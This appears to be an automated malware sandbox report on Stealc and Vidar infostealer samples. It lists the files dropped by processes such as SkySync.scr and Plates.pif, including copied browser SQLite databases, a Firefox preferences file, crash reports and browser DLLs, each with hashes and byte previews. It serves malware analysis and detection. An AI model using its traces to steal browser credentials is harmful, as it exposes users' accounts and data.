	o3QbCA4xLs.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	N#U0435wIns.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	xLgTQcFdIJ.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc	Browse
	file.exe	Get hash	malicious	Stealc	Browse

Created / dropped Files

C:\ProgramData\AKFCBFHJDHJK\BGDAKE

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	SQLite 3.x database, last written using SQLite version 3036000, file counter 4, database pages 35, cookie 0x1e, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	163840
Entropy (8bit):	0.44975538801868414
Encrypted:	false
SSDEEP:	96:Ou1HAU+bDoYysX0uhnyZtha58VjN9DLjGQLBE3u:Ou1X+bDo3irhnyBi8Vj3XBBE3u
MD5:	89E4498D0328AFC71113CC75EBE7D770
SHA1:	120CF58C897FF1025F8B4F854A21821D948F74BC
SHA-256:	F50B271AFE0D4950FAE539E4A04C3D07849F0CE2250E73B352CDB3D981095B40
SHA-512:	7914EDF9352FBB1ABB6A0B89A4F47F09DE5672DEB6B4BE9EBEA833C8D1ED3EFD5AD16A612DF3DF65C878EB577FD0B697BC44C3E52D9BBFB82A81C1C903621989
Malicious:	false
Preview:	SQLite format 3......@ .......#..................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFCBFHJDHJK\DBKEHD

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	ASCII text, with very long lines (1046), with CRLF line terminators
Category:	dropped
Size (bytes):	11923
Entropy (8bit):	5.2717384530749305
Encrypted:	false
SSDEEP:	192:58IXrFgMqaxu7aWUBp9PXaUhK+74NMre6w/hUiCw8TPD:geuajQthyre6wZCwGD
MD5:	59AF94B2C60EC3837D8D67F15C1C4716
SHA1:	204BADE84E385B4A87F5788B822AD60E743D891D
SHA-256:	4306770AFEFFF70ABB01C6E4CEA53C280917FF1458CF679C6745028BC7D36980
SHA-512:	3D9CEF70CE911AB4C053294BECE18F503D380A6FE4762764074988356CD6E2413268ED7F34C2225F1E78E917454318977CE6C88B6D2E0BF978367A426D358881
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.installation.timestamp", "132737585657068823");..user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "29abcd1e-1a70-48c8-93bf-45f85e2f4118");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.previous.reasons", "[\"app.update.background.enabled=false\"]");..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 0);..user_pref("app.update.lastUpdateTime.background-update-timer", 0);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1629285077);..user_pref("app.update.l

C:\ProgramData\AKFCBFHJDHJK\DBKKFC

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFCBFHJDHJK\FBGIDH

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08231524779339361
Encrypted:	false
SSDEEP:	12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
MD5:	886A5F9308577FDF19279AA582D0024D
SHA1:	CDCCC11837CDDB657EB0EF6A01202451ECDF4992
SHA-256:	BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
SHA-512:	FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFCBFHJDHJK\FBGIDH-shm

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFCBFHJDHJK\GCFIIE

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 8, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1270069299941012
Encrypted:	false
SSDEEP:	192:sV+4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWUsVusE6:sV+4n/9p/39J6hwNKRmqu+3VusE
MD5:	A0809345D97723CD4173E27957D88904
SHA1:	0F591E66F05A0422B8FC81A5B0AB6099A6C9A226
SHA-256:	3CA1D9E735A21DF7A4C6CC6272F5754B1EBD6DC79AC4E3E61E3562B4E71FE36E
SHA-512:	7BA1223D04BBA47F0D579FD47654773EAEF2A41BC53BC0323F84095F19CE04A0084AB58F999B6A3ED61F33A87B2142E07AF0493F14EAA307985EC2BA44997617
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFCBFHJDHJK\GIJEBK

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	0.7310370201569906
Encrypted:	false
SSDEEP:	96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
MD5:	A802F475CA2D00B16F45FEA728F2247C
SHA1:	AF57C02DA108CFA0D7323252126CC87D7B608786
SHA-256:	156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
SHA-512:	275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFCBFHJDHJK\JKEGDH

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	SQLite 3.x database, last written using SQLite version 3045002, file counter 21, database pages 54, 1st free page 10, free pages 14, cookie 0x50, schema 4, UTF-8, version-valid-for 21
Category:	dropped
Size (bytes):	229376
Entropy (8bit):	0.8702785449902919
Encrypted:	false
SSDEEP:	384:u0ATqjAfepy42PWoo/oftTBBE3utC7UqrDvQoJMAa:rATq8feA42PWoo/oftTBBjuUVAa
MD5:	E782D8B6164B8CF64500A01B85E5FD38
SHA1:	C9D4CEAAE1A4FA6E8E74281520262B9ABCA02E18
SHA-256:	E42275C994991D8927C6FAAF7F38E394FFC080CAB5AE61136343DA5686C9B99F
SHA-512:	1C0D174F9CF3B0AC3331013C7E9E45B5646BECF11617E635E20370E4C9289D529CE922DF9719BC3354D0B78DD2AB990AC9DE81908E5D8F799386CF3936DE340A
Malicious:	false
Preview:	SQLite format 3......@ .......6...........P......................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFCBFHJDHJK\JKKEBG

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	SQLite 3.x database, user version 57, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 2, database pages 41, cookie 0x21, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.035631294721445904
Encrypted:	false
SSDEEP:	192:bZjnkYjcoBMcygNDI7oslTYBIQg6Ism2Vspvp0:bZTVTBMcygNDuT1l62p
MD5:	59E4A8110FA2BCC012E341B93E96E93D
SHA1:	EE08810B0CE857F01170C08A24B9D438B64D577D
SHA-256:	3A85F2FC349A7E431EA6F1FC4568C99C1918D478AD6FE6445D560EF00395DB40
SHA-512:	2AD00B0FCBE4FC37ECAA68C16BE32A904D682A23ACF5B39BCECF5DC280E23933FDD5A0D2A92A45F2C77618CA7466334AFEB1EAA7EA07BF4E043282B31039E8FF
Malicious:	false
Preview:	SQLite format 3......@ .......)...........!...................9..................................S`....(e......}$\|.\|N{.{sz.z{z.yAx.x!w.v.wZu7tNt.s.s\r.rJq.p.q.p.o.o.o.m.mal&k.k.g.g3f.f.e.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFCBFHJDHJK\JKKEBG-shm

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFCBFHJDHJK\KJKKJK

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.86528072116055
Encrypted:	false
SSDEEP:	96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
MD5:	8CC409C8658C3F05143C1484A1719879
SHA1:	909CDE14664C0E5F943764895E0A9DFEC7831FF5
SHA-256:	BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
SHA-512:	55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAKFIIJJKJJ\BAKEBF

Download File

Process:	C:\Users\user\AppData\Local\Temp\646751\Plates.pif
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	modified
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAKFIIJJKJJ\CAKKEG

Download File

Process:	C:\Users\user\AppData\Local\Temp\646751\Plates.pif
File Type:	SQLite 3.x database, last written using SQLite version 3045002, file counter 21, database pages 54, 1st free page 10, free pages 14, cookie 0x50, schema 4, UTF-8, version-valid-for 21
Category:	dropped
Size (bytes):	229376
Entropy (8bit):	0.8702785449902919
Encrypted:	false
SSDEEP:	384:u0ATqjAfepy42PWoo/oftTBBE3utC7UqrDvQoJMAa:rATq8feA42PWoo/oftTBBjuUVAa
MD5:	E782D8B6164B8CF64500A01B85E5FD38
SHA1:	C9D4CEAAE1A4FA6E8E74281520262B9ABCA02E18
SHA-256:	E42275C994991D8927C6FAAF7F38E394FFC080CAB5AE61136343DA5686C9B99F
SHA-512:	1C0D174F9CF3B0AC3331013C7E9E45B5646BECF11617E635E20370E4C9289D529CE922DF9719BC3354D0B78DD2AB990AC9DE81908E5D8F799386CF3936DE340A
Malicious:	false
Preview:	SQLite format 3......@ .......6...........P......................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBAKFIIJJKJJ\KFIJJJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\646751\Plates.pif
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.86528072116055
Encrypted:	false
SSDEEP:	96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
MD5:	8CC409C8658C3F05143C1484A1719879
SHA1:	909CDE14664C0E5F943764895E0A9DFEC7831FF5
SHA-256:	BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
SHA-512:	55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Plates.pif_8df06e8fd842c996d8c031a9ea377f9465b82f8b_65c18442_b5b18356-7e6b-4f03-bfa6-94899befb52e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2370854010755448
Encrypted:	false
SSDEEP:	192:7ytZ2lwmrgu98jN+RkXoZ20SDu76OfAIO8he:yZ2l5rgu98j8SDu76OfAIO8o
MD5:	617B0444AFFAC7ED195F8F77EC2E551C
SHA1:	471E1D3B450EA61B0F323CEB5BC0B27B93EBFFEF
SHA-256:	954DBE9773FBAD4539DF59C4EB2C6B960B84EED45350C3EDCD7C9BFE06F1C4CB
SHA-512:	E486A5E524490FB6D2994A18610A4617E37FAC9F080C0FA9283CC1FAA20FD0DD7BE1D7CAF264C3D6B6609A5965398BD63DA65CD5F05622E34689B8A64A44C5E8
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.9.6.4.4.2.0.1.6.9.5.7.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.9.6.4.4.2.0.6.6.9.4.1.9.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.b.1.8.3.5.6.-.7.e.6.b.-.4.f.0.3.-.b.f.a.6.-.9.4.8.9.9.b.e.f.b.5.2.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.f.0.0.0.2.6.-.5.d.e.8.-.4.e.5.c.-.a.e.c.a.-.8.9.6.1.e.8.5.8.e.a.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.l.a.t.e.s...p.i.f.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.u.t.o.I.t.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.1.0.c.-.0.0.0.1.-.0.0.4.d.-.4.e.4.9.-.5.d.6.4.9.7.2.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.a.7.3.a.d.4.5.6.4.7.3.1.f.5.2.1.6.1.5.f.0.f.8.8.5.7.d.f.f.f.0.0.0.0.0.9.0.8.!.0.0.0.0.1.b.d.5.c.a.2.9.f.c.3.5.f.c.8.a.c.3.4.6.f.2.3.b.1.5.5.3.3.7.c.5.b.2.8.b.b.c.3.6.!.P.l.a.t.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE5BB.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Nov 1 19:53:40 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	277408
Entropy (8bit):	1.3525091528357787
Encrypted:	false
SSDEEP:	768:NeyzrJHMpm9P2Rk94ZtGnLwaI/tukjBiwMlwU+FjPP2:N1gRRk94ZIw5bMlDML2
MD5:	ABA4B4183248CC084579F62AF26330A4
SHA1:	3C492C369B832EFBBA3F80EA8489C53129FF05CD
SHA-256:	66A3D9B2305491602CC0BA89BAABBC52CD46A3D392897B829DCC4DFF00FC933C
SHA-512:	5CE26943BAE4CB055B84032440078287C6A5806C32FFDE5F9BFECBA0C1120FE246B5608F687EE7B70CB83F2C1D27F592E7D7EB842C54A87BD14A0F0CF30D7B62
Malicious:	false
Preview:	MDMP..a..... ........1%g............T...........$%..\...........FP..........T.......8...........T............Z...............-..........l/..............................................................................bJ.......0......GenuineIntel...........T........!..+1%g'...(........................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE704.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6356
Entropy (8bit):	3.711369518946069
Encrypted:	false
SSDEEP:	192:R9l7lZNizj6j/lY8INc2pDG89b1Nsf7LHm:R9lnNi36j/lY8INN1GfO
MD5:	9689DD8EBB5AD1CE2BF00BB3DD3771AB
SHA1:	DC927FE7E513CAFFEA260472F0A0A879555390F3
SHA-256:	654E8BB9D58D19E85196AA9613CFE75EE472B5818B7F72AF540218A92E448B40
SHA-512:	34EBB0CD7FF3AD6C04890CD3C6211AA2575D104FBAF12CB7856C95DB02A002907BB07104C84D7ECF4C66E6EA84550F34062EE19ABC226F7FFFF33BBCA60C2F65
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.4.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE725.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4871
Entropy (8bit):	4.467121778952525
Encrypted:	false
SSDEEP:	48:cvIwwtl8zsVe702I7VFJ5WS2CfjkRs3rm8M4Jwy9YuZFP+q8vuYu7AHHZKIgd:uILfc7GySPf9JwSKIEHZKIgd
MD5:	1C2221A9CA6B7C5B9317F2248907AAB8
SHA1:	C8A5AAD243AEEF5776ABB4A00BB81C958BE697E3
SHA-256:	CA8CB2F5827F847F7D6B8DAEA9EAC2D7D171206158BA6B9AEDAE121F914D7326
SHA-512:	400F6AD05208C2E3DFE1FE7B29764FB7FFD3EF82F368A2E0286ED764D2565D68913045AE87766DF56D27FFDA1615527FB5FF4ABC88C41967498A9962D5DC4366
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222913265" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\ProgramData\chrome.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\646751\Plates.pif
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	692736
Entropy (8bit):	6.304379785339226
Encrypted:	false
SSDEEP:	12288:Kk5nGNLFzxC+gej5yNcTN+pt+tLK75PL2rn65hYVKKuKOvy/j3t:KMGNL/geFyNcTN+jv75TQn652VBuNyb
MD5:	EDA18948A989176F4EEBB175CE806255
SHA1:	FF22A3D5F5FB705137F233C36622C79EAB995897
SHA-256:	81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
SHA-512:	160ED9990C37A4753FC0F5111C94414568654AFBEDC05308308197DF2A99594F2D5D8FE511FD2279543A869ED20248E603D88A0B9B8FB119E8E6131B0C52FF85
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: F2Y5tbGngK.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: o3QbCA4xLs.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: N#U0435wIns.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: xLgTQcFdIJ.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s,.>7M.m7M.m7M.m\|5.l<M.m\|5.l.M.m\|5.l#M.m'..l"M.m'..l'M.m'..l.M.m\|5.l:M.m7M.m.M.m7M.mlM.m...l6M.m...l6M.mRich7M.m........................PE..L......g.........."!...)............P.....................................................@..........................\..l...<].................................. 8...(..T....................(......@'..@............................................text............................... ..`.rdata..zV.......X..................@..@.data...T....p.......N..............@....reloc.. 8.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
